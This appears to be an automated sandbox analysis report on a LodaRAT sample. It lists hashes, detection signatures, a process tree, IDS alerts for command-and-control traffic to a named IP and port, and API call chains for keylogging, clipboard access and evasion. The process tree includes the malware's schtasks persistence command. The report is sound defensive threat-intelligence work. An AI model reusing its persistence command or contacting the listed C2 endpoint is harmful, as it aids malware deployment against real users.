Windows Analysis Report
bf-p2b.exe

Overview

General Information

Sample Name: bf-p2b.exe
Analysis ID: 1350639
MD5: 1446d857fe2760cff287a534295226f4
SHA1: 79c0484ed853d1ab8ab3942854666c0c59363721
SHA256: dc93cb125eb5d10c02312b369ee50060e0a3ed28001864bba114dc28111e3cfd
Tags: Boredfluffexe

Detection

LodaRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected LodaRAT
Yara detected LodaRat
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Contains functionality to modify clipboard data
Machine Learning detection for dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to query the security center for anti-virus and firewall products
Found evasive API chain (date check)
Contains functionality to execute programs as a different user
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Yara detected ProcessChecker
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
OS version to string mapping found (often used in BOTs)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Creates a start menu entry (Start Menu\Programs\Startup)
Potential key logger detected (key state polling based)
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • bf-p2b.exe (PID: 7420 cmdline: C:\Users\user\Desktop\bf-p2b.exe MD5: 1446D857FE2760CFF287A534295226F4)
    • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7512 cmdline: schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
    • wscript.exe (PID: 7492 cmdline: WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • Softwarefx-Acrobat-Reader.exe (PID: 7592 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7632 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7704 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • cleanup
Malware Configuration / Threat Name

Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
No configs have been found
Yara matches (Source | Rule | Description | Author)

Source: dump.pcap | Rule: JoeSecurity_LodaRat_1 | Description: Yara detected LodaRat | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\JWPING.vbs | Rule: JoeSecurity_ProcessChecker | Description: Yara detected ProcessChecker | Author: Joe Security
Source: 00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_ProcessChecker | Description: Yara detected ProcessChecker | Author: Joe Security
Source: 00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_ProcessChecker | Description: Yara detected ProcessChecker | Author: Joe Security
Source: Process Memory Space: bf-p2b.exe PID: 7420 | Rule: JoeSecurity_LodaRAT | Description: Yara detected LodaRAT | Author: Joe Security
Source: Process Memory Space: bf-p2b.exe PID: 7420 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: wscript.exe PID: 7492 | Rule: JoeSecurity_ProcessChecker | Description: Yara detected ProcessChecker | Author: Joe Security

No Sigma rule has matched

Snort IDS alerts

Timestamp: 11/30/23-17:07:37.309723
SID: 2849885
Source IP: 192.168.2.4
Destination IP: 172.111.138.100
Source Port: 49736
Destination Port: 5552
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/23-17:07:37.309723
SID: 2822116
Source IP: 192.168.2.4
Destination IP: 172.111.138.100
Source Port: 49736
Destination Port: 5552
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/23-17:08:57.785609
SID: 2830912
Source IP: 172.111.138.100
Destination IP: 192.168.2.4
Source Port: 5552
Destination Port: 49736
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\JWPING.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | ReversingLabs: Detection: 48%
Source: bf-p2b.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Joe Sandbox ML: detected
Source: bf-p2b.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1DD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4FD47 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F22044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F2219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F224A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F16B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEDD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1FD47 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F16E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose

Networking

Source: Traffic | Snort IDS: 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 192.168.2.4:49736 -> 172.111.138.100:5552
Source: Traffic | Snort IDS: 2822116 ETPRO TROJAN Loda Logger CnC Beacon 192.168.2.4:49736 -> 172.111.138.100:5552
Source: Traffic | Snort IDS: 2830912 ETPRO TROJAN Loda Logger CnC Beacon Response M2 172.111.138.100:5552 -> 192.168.2.4:49736
Source: Joe Sandbox View | ASN Name: VOXILITYGB VOXILITYGB
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100 (17 identical entries)
Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B5550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B57294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F27294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B57099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B44342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B57099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: bf-p2b.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F182D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B630AD
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B13680
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B0DCD0
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B0A0C0
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B20183
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B3113E
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B212F9
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4220C
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B3542F
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F5D0
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B08530
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B06670
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B20677
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6A8DC
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B3599F
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B20A8F
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B06BBC
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2AC83
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B0BDF0
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2BDF6
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B05D32
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1AD5C
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B34EBF
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B20EC4
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B21E5A
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B4BFB8
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B37FFD
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B2DF69
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EDDCD0
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EDA0C0
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F330AD
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF0183
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F0113E
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF12F9
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1220C
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F0542F
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F5D0
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED8530
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EE3680
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF0677
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED6670
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3A8DC
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F0599F
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF0A8F
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED6BBC
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFAC83
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFBDF6
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EDBDF0
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEAD5C
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED5D32
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF0EC4
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F04EBF
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EF1E5A
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F07FFD
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F1BFB8
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EFDF69
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: String function: 00B1F885 appears 67 times
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: String function: 00B27750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: String function: 00EF7750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: String function: 00EEF885 appears 67 times
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B3B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746A5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F0A1 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B702AA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F3AB NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F3DA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F37C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F425 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F45A ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F594 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1B7F2 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1B845 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6EA4E NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1AC99 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6FE80 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B1AFB4 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\bf-p2b.exe | Code function: 0_2_00B6FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00ED29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F0A1 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F402AA NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F3DA NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F3AB NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F37C NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F45A ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F425 NtdllDialogWndProc_W
